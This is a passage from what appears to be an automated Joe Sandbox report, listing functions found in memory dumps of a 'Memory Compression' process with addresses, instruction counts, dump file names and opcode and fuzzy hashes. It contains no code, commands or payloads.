                                      • Instruction ID: a363b9e798b11bc3a1235b8c4b759fe038ff69546075d2a4b362417af07b8cb7
                                      • Opcode Fuzzy Hash: 470cf0be37567cf04d393d21be98d453cbf6a115aab5859a951be1b3ac4b5db0
                                      • Instruction Fuzzy Hash: 52D0C971C19B4A8FE694EA1C844E3A9BBF1FF54340B54002AD40892146DF315842DB01
                                      Function 00007FF886ED0515 Relevance: .4, Instructions: 386COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8403f99686eb58f8fac536645bfc74f56f8240e4daae853bedb5f164d897370
                                      • Instruction ID: 7f4506bef18bb54e62d2691e57855430c2139097c904802bcd6202e370e609a3
                                      • Opcode Fuzzy Hash: a8403f99686eb58f8fac536645bfc74f56f8240e4daae853bedb5f164d897370
                                      • Instruction Fuzzy Hash: 0CB12403E0E5DA4AE2117AACBC591F97F90FF523A4B1C82B7D08C8A1D7DD1C98468296
                                      Function 00007FF886ED05A0 Relevance: .3, Instructions: 314COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7384c5cd3f97542189bddf72baacdd8d02fa5cc118558129dac69d4777b53d57
                                      • Instruction ID: d70c9ce7277920d2eb50f56636b0a0f560c1ad22c4f72d6b364868e5caf15d1d
                                      • Opcode Fuzzy Hash: 7384c5cd3f97542189bddf72baacdd8d02fa5cc118558129dac69d4777b53d57
                                      • Instruction Fuzzy Hash: A5910402E1E5D64EE2116ABCBC591F97F90FF523A4B1C82F7D0888F1D7DD1C98468296
                                      Function 00007FF886ED05ED Relevance: .3, Instructions: 304COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 95a37b0c57dc9815c45c68ddfe6ba65be022023f423767aa62d8647c8550bed0
                                      • Instruction ID: b579b044a4094c5d83edb1da7a14f96299fdc843d895ed6b33545cd359ac0c45
                                      • Opcode Fuzzy Hash: 95a37b0c57dc9815c45c68ddfe6ba65be022023f423767aa62d8647c8550bed0
                                      • Instruction Fuzzy Hash: B2912302E0E6D64FE2116ABCAC191F97F90FF523A0B1C82F7D0888B1D7DD189846C292
                                      Function 00007FF886ED16B8 Relevance: .3, Instructions: 285COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8779a2164d3fd2d56926c594a4d56de099f4220e842663fb0cff5a68a003723f
                                      • Instruction ID: 754ceb38c10c803716b7878dcf88876e2e5eedaeb93557542587b1cb0881c684
                                      • Opcode Fuzzy Hash: 8779a2164d3fd2d56926c594a4d56de099f4220e842663fb0cff5a68a003723f
                                      • Instruction Fuzzy Hash: 8B819D31A1CA498BDB58DE5C98556B977E2FFD9741F24427EE44EC3282CE34AC02C781
                                      Function 00007FF886ED0640 Relevance: .3, Instructions: 265COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 010ea11bf09f877a3fb2b2ec35c25868228275b9be94e423d8b6a3ad29ad874e
                                      • Instruction ID: b26185641c65eb062a09b5418ae3106f6bf4d30c652b5b7c2973c3e63189bf71
                                      • Opcode Fuzzy Hash: 010ea11bf09f877a3fb2b2ec35c25868228275b9be94e423d8b6a3ad29ad874e
                                      • Instruction Fuzzy Hash: 1C711512E1E6D64EE2116ABCBC191F96F90FF523A0B1C92F7D0898F1DBDC1C9846C295
                                      Function 00007FF886ED05B0 Relevance: .2, Instructions: 242COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 516f4a8d42984600c4d759998f78897db977915a4381b981822008bb920383ff
                                      • Instruction ID: 10192cb2bd3bc4ac7e285bb78e9af6d120fb7d20ba36b26f7d5274d3f591839d
                                      • Opcode Fuzzy Hash: 516f4a8d42984600c4d759998f78897db977915a4381b981822008bb920383ff
                                      • Instruction Fuzzy Hash: 0C711512E1E6964FE3116ABCAC591E97F90FF523A0F1C82B7C0888B0D7DD18A846C391
                                      Function 00007FF886ED1CED Relevance: .2, Instructions: 187COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a8638bfc53a9fdabe3a3c5c175878ca1f564305af06a14e9bf370d4aa8906acf
                                      • Instruction ID: dfee55b4b1489653bc410526bf387b73aa053724ed57fbf7a4188717cc8096b4
                                      • Opcode Fuzzy Hash: a8638bfc53a9fdabe3a3c5c175878ca1f564305af06a14e9bf370d4aa8906acf
                                      • Instruction Fuzzy Hash: 9E51B031A18A498FDB58DE1C88556BA77E2FFD8351B24427ED45EC7282CE34EC02CB81
                                      Function 00007FF886EE4000 Relevance: .2, Instructions: 166COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e4f3a062d372f5f5466757ad8a8a2f33478fe46259c305749c1ba9746256a7d4
                                      • Instruction ID: 52edae46d560bf7d3475de75b250ab290dfa954e6557016614f2066d8c957f1d
                                      • Opcode Fuzzy Hash: e4f3a062d372f5f5466757ad8a8a2f33478fe46259c305749c1ba9746256a7d4
                                      • Instruction Fuzzy Hash: B5413827B0C1568BD300BBACF8595EF7BA0EF913B1F140477D548CA053DA28A45EC7A2
                                      Function 00007FF886ED31A5 Relevance: .1, Instructions: 145COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3683b48f8d2b21ee70907f1a6dbc0621f36e7e82df860f74813bb32cad722186
                                      • Instruction ID: 6439749c2e105c0da41e3ef7fd4790962fae6c767753103ac3c1140385debf24
                                      • Opcode Fuzzy Hash: 3683b48f8d2b21ee70907f1a6dbc0621f36e7e82df860f74813bb32cad722186
                                      • Instruction Fuzzy Hash: 7E514870D1861E8FEB54EB98C4996FDBBF1FF5A354F60017AD009E7292DA38A844CB40
                                      Function 00007FF886EE2D4D Relevance: .1, Instructions: 124COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a54c6b82e4a9bd6d4e8ec8ce25bc5c7289f24b4fc95f143c8b445470321db990
                                      • Instruction ID: d08644cfccd7f6a1d7493c59bce525ad9f171136aa7041bf35da5107c9c0cfc7
                                      • Opcode Fuzzy Hash: a54c6b82e4a9bd6d4e8ec8ce25bc5c7289f24b4fc95f143c8b445470321db990
                                      • Instruction Fuzzy Hash: 89412D30E2895D8FEB84EF98D85A6EDB7B1FF58300F100179E009E7296CE386841CB51
                                      Function 00007FF886EDB6FD Relevance: .1, Instructions: 118COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: aebe66de7861428a96bc0a53acb1579778a1c2f9c772e1637339853e22a80233
                                      • Instruction ID: 0621b13cbf5fe73dc6de597329c88379df23c612b8b58b6bcdac084dbc364f2b
                                      • Opcode Fuzzy Hash: aebe66de7861428a96bc0a53acb1579778a1c2f9c772e1637339853e22a80233
                                      • Instruction Fuzzy Hash: 2C414EB0D0855A9FEB54DB68C8457ED77F2FF58340F6482B6C009E7292EA38A985CF44
                                      Function 00007FF886EDC798 Relevance: .1, Instructions: 111COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e3c0af342b46f75a2ed07c718ab0627fdf7f490f0d650e9cca241a22c3741ba0
                                      • Instruction ID: dade327b3e963d94e08478954737200fae252571add7895c77c8bd70ab94fe70
                                      • Opcode Fuzzy Hash: e3c0af342b46f75a2ed07c718ab0627fdf7f490f0d650e9cca241a22c3741ba0
                                      • Instruction Fuzzy Hash: 4C31A675D1891D9FEB98EB5CD855AACB7B6FF58780F601139D00DE3282EE246C42DB40
                                      Function 00007FF886EDFA40 Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EDF000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EDF000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886edf000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9600a7efd378e52e4389a4ee2ff8b36df8b2d4d03045f1c04df96ba24aa85b97
                                      • Instruction ID: 3c7b8736182be66b367eeba328a748fdc2540db82619887f946e49b22a3fdb77
                                      • Opcode Fuzzy Hash: 9600a7efd378e52e4389a4ee2ff8b36df8b2d4d03045f1c04df96ba24aa85b97
                                      • Instruction Fuzzy Hash: 05412B70E189198FDBA8DB189C957A9B7B1FF59341F5042E9D40DE3282DE346D81CF41
                                      Function 00007FF886EDC810 Relevance: .1, Instructions: 96COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED9000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed9000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: de9441f5db1d9f8e64ad8daa28a1f7aff21489b9fdeed48a162e46e5369e5975
                                      • Instruction ID: 746c4e43e74488407b498c684c04a6d0c81dae504eba1461bec36e9358020cf4
                                      • Opcode Fuzzy Hash: de9441f5db1d9f8e64ad8daa28a1f7aff21489b9fdeed48a162e46e5369e5975
                                      • Instruction Fuzzy Hash: 8921B974E1C91D8FEB94EB9CD855AACB7B6FF59380F60112AD00DE3282DE246C42CB40
                                      Function 00007FF886ED0805 Relevance: .1, Instructions: 86COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cfd5cd1aea6070b054d69d904996708cbf448b2e7e31a8c3e37143a6a0f6ec3c
                                      • Instruction ID: deff5011f06e1c3b02d7dfa5e577dac132186bd3a8fbb5712d0433d49e0f9479
                                      • Opcode Fuzzy Hash: cfd5cd1aea6070b054d69d904996708cbf448b2e7e31a8c3e37143a6a0f6ec3c
                                      • Instruction Fuzzy Hash: E1212666E2D6869BE3016B7CDC1A2E97790FF113A4F0C4172D458CA083EE18A456C2C1
                                      Function 00007FF886ED2189 Relevance: .1, Instructions: 74COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e2e59311ed1c8478fc32245de9ebf779d8a37de85db65724d5e0508e7f541d8
                                      • Instruction ID: 0bfb18bb8fbb86df82f26762e71ee273a719a2b658ed657b07a8582436b67a38
                                      • Opcode Fuzzy Hash: 2e2e59311ed1c8478fc32245de9ebf779d8a37de85db65724d5e0508e7f541d8
                                      • Instruction Fuzzy Hash: 9511933092CA4A4FE745E778844A2B977E0FF46384F1144B6D41DC7493DE2CA889C752
                                      Function 00007FF886EE73E5 Relevance: .1, Instructions: 70COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 04d0ec121bb634144f10e61d29e7801c1bcb501b9a2d8725b700082c2ab94f4a
                                      • Instruction ID: 7251f1528abbd2cd6b58ba004a73371cc1e489bbe6d2dca7d4717ccd83f7b66b
                                      • Opcode Fuzzy Hash: 04d0ec121bb634144f10e61d29e7801c1bcb501b9a2d8725b700082c2ab94f4a
                                      • Instruction Fuzzy Hash: A7219D30D08A4E9FEF99EF68C4992B97BA0FF28350F2405BED41DC7192DA35A885C751
                                      Function 00007FF886ED339F Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf374dcd1187aa3d23ab786f4c192f1030a230550ea98c616ce88dcefb800076
                                      • Instruction ID: 38c0e6aa438b87c3e11795df0684869039ebe91601478c7bb56391833b807d8f
                                      • Opcode Fuzzy Hash: cf374dcd1187aa3d23ab786f4c192f1030a230550ea98c616ce88dcefb800076
                                      • Instruction Fuzzy Hash: A1219D3094D69A8FEB42EB7888586A97FF0FF4B350F1904F6D458CB0A3DA6D9846C711
                                      Function 00007FF886EE2CB0 Relevance: .1, Instructions: 69COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5971312ebf0eca3cf3af21169ba98c3016ab397582ed72eb1f5818a8a9064eba
                                      • Instruction ID: 0528fb8b888ffa658a75992320c65fdeb0294d59f440413b9277b8f339350c0c
                                      • Opcode Fuzzy Hash: 5971312ebf0eca3cf3af21169ba98c3016ab397582ed72eb1f5818a8a9064eba
                                      • Instruction Fuzzy Hash: 3311903484D7894FEB069B30886A2A57FB0FF16204F2604FBD449CB4D3DA2D5959C722
                                      Function 00007FF886EE7341 Relevance: .1, Instructions: 68COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fd2af1eb45543fd27e157b72ca8ae2d5f12e55d7cfae9770c834b477963f2d9e
                                      • Instruction ID: def39e1015d62a136cac899cf2e1d9ceb19f013595079b955051094ed7d01675
                                      • Opcode Fuzzy Hash: fd2af1eb45543fd27e157b72ca8ae2d5f12e55d7cfae9770c834b477963f2d9e
                                      • Instruction Fuzzy Hash: 12117C30D0864E9FEF99EF68849A2BD7BA1FF68341F1405BED809C7192DA34A844C791
                                      Function 00007FF886EE4D05 Relevance: .1, Instructions: 67COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c4f724dce4270c97757e8161d37771cdd4e64e575874186030160dd9240dfe6b
                                      • Instruction ID: 5951018077f4df444aec8ebdf76967be411821e211ffa9954712194b2a99bf06
                                      • Opcode Fuzzy Hash: c4f724dce4270c97757e8161d37771cdd4e64e575874186030160dd9240dfe6b
                                      • Instruction Fuzzy Hash: 3C118E74D08A4EDFEB99EF6884592BD7BE0FF68341F2005BAD40DC7592CA38A940CB51
                                      Function 00007FF886ED0A01 Relevance: .1, Instructions: 66COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7cbb31d12a1fae5d9e7d163c9e6dddbb9e5df2d486b0ea942d3300ba78499459
                                      • Instruction ID: cce57d5da50db4416515c1a88d4e3cf6179c418971b40c922f6f59f3b929b099
                                      • Opcode Fuzzy Hash: 7cbb31d12a1fae5d9e7d163c9e6dddbb9e5df2d486b0ea942d3300ba78499459
                                      • Instruction Fuzzy Hash: 05118F30D18A0E8EE790EF68C8492BD77E0FF58340F5545B6C41DC7192EE38A844C740
                                      Function 00007FF886EE2AA1 Relevance: .1, Instructions: 65COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 23945629848b09017bfb56980dadc323b6bab8e23a6a307adc36cfbf9ab6bd57
                                      • Instruction ID: f315a3bcbc7d7e67d3890e1c991517e279e0d4f602e0bab797f5e5260d4ae4d8
                                      • Opcode Fuzzy Hash: 23945629848b09017bfb56980dadc323b6bab8e23a6a307adc36cfbf9ab6bd57
                                      • Instruction Fuzzy Hash: 4A118E709186498FDB58DF58C4965F93BE1FF58354F11027EE80EC3185CA38A880CB91
                                      Function 00007FF886EE4C69 Relevance: .1, Instructions: 64COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cef52d721ce85d58838b4b39ad626379abb294500b48d8d0d9b250bc4ea0d75d
                                      • Instruction ID: 3fe88fb29df0dc2aca18ee7ea233f306543879afb897fa2fb0734abfd3b681fb
                                      • Opcode Fuzzy Hash: cef52d721ce85d58838b4b39ad626379abb294500b48d8d0d9b250bc4ea0d75d
                                      • Instruction Fuzzy Hash: EE21C030E0864D9FEB99EF6884592B97BE0FF69340F1405BAD40DCB592CA38A944C751
                                      Function 00007FF886EE5229 Relevance: .1, Instructions: 62COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ddd0ab69e1fa30f87a51fcf88f665ad2ee60aebf0470841bf7201e53a5d8a0f9
                                      • Instruction ID: 3658ad3515c01a38773bae363502635a540171fe2909a5a05b11c95b3d101169
                                      • Opcode Fuzzy Hash: ddd0ab69e1fa30f87a51fcf88f665ad2ee60aebf0470841bf7201e53a5d8a0f9
                                      • Instruction Fuzzy Hash: 2711B2B0D0DA8D8FEB5ADB6488A52B87BB0FF69340F1504FED04DC7592DA296844C752
                                      Function 00007FF886EE12A5 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 67413f633cff824faa1b7a9e15c94a77f4373bd89c8ead82f9112d42863ed5ee
                                      • Instruction ID: 7fa17f2ef7318ec9b869f11c2cdd357ab30a246f6d30d4b878b8df9f72bc4949
                                      • Opcode Fuzzy Hash: 67413f633cff824faa1b7a9e15c94a77f4373bd89c8ead82f9112d42863ed5ee
                                      • Instruction Fuzzy Hash: A611583090864E8FDB89EF64C8592FA7BB1FF69301F5005BAD409C7592DA35A980C741
                                      Function 00007FF886EE7AD1 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0c65f3ad82e2cefd6eead854c3f7d8f745b72ca239a1a64953732d43b4d26374
                                      • Instruction ID: 9f62372fa8f5757b486001587e6fb7ca3bc2ab33c4ecbf44523426f400b4524e
                                      • Opcode Fuzzy Hash: 0c65f3ad82e2cefd6eead854c3f7d8f745b72ca239a1a64953732d43b4d26374
                                      • Instruction Fuzzy Hash: 41117030D0C55A9FEB41EB78C88C6AA7BE0FF19380F1409B6D509C7055DA38A980C761
                                      Function 00007FF886EE7505 Relevance: .1, Instructions: 61COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8005e3a24583be74f2c00a25665cf9db7191c4d6531c4ad3ac0e31a1a8dd8dd0
                                      • Instruction ID: 6e547ecd08cfa59dfc6d735032eb8222ccfd08fd20d22b98cb72e383980459ae
                                      • Opcode Fuzzy Hash: 8005e3a24583be74f2c00a25665cf9db7191c4d6531c4ad3ac0e31a1a8dd8dd0
                                      • Instruction Fuzzy Hash: 36112370D1DA898BEF99DF6488E52B83BE0FF55300F1400BED10DC31A2CE285848C712
                                      Function 00007FF886ED112D Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886ED0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ed0000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4c69d9143f114f437cced8d12973c3eb39e92b865362a8f03ee7420f30395da7
                                      • Instruction ID: 3bf9d82c4737c4c1ce0e6f2b07ba3a4bbfe5ed6bb1bc27bd3ae65b8e587d52fd
                                      • Opcode Fuzzy Hash: 4c69d9143f114f437cced8d12973c3eb39e92b865362a8f03ee7420f30395da7
                                      • Instruction Fuzzy Hash: BE11BF70918A4E8EEB999B68C8587FA7BF0FF2A351F1005BEC41AC61D3DE296844C700
                                      Function 00007FF886EE2EA1 Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE1000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee1000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2f218110a7ee1e3e48c8b2561c9ae5052ffcbc32fca302f130485b474d287824
                                      • Instruction ID: 36193dc3a5813ea7e7da1c3f669c9c3519861113282d9731f5520a2b9141cc99
                                      • Opcode Fuzzy Hash: 2f218110a7ee1e3e48c8b2561c9ae5052ffcbc32fca302f130485b474d287824
                                      • Instruction Fuzzy Hash: C501A130D1855A8EEB42EBB8844D5F97BF0FF09340F1409B6D448C7062DA349584C741
                                      Function 00007FF886EE759D Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6bc6446e44a987bf96504dc780b7ad9205697de7144597d6eae3cf0fe50718c0
                                      • Instruction ID: 225f4fd76c3b2f82d5aba4981ff29a5edab8a1a306696916a17b6ec670f5378d
                                      • Opcode Fuzzy Hash: 6bc6446e44a987bf96504dc780b7ad9205697de7144597d6eae3cf0fe50718c0
                                      • Instruction Fuzzy Hash: 2811C130D0864E8FEF59EF6884992BA7BA0FF68340F2401BAD44DC3192CE38A845C751
                                      Function 00007FF886EE5599 Relevance: .1, Instructions: 58COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 0000002A.00000002.1539701835.00007FF886EE4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE4000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_42_2_7ff886ee4000_Memory Compression.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
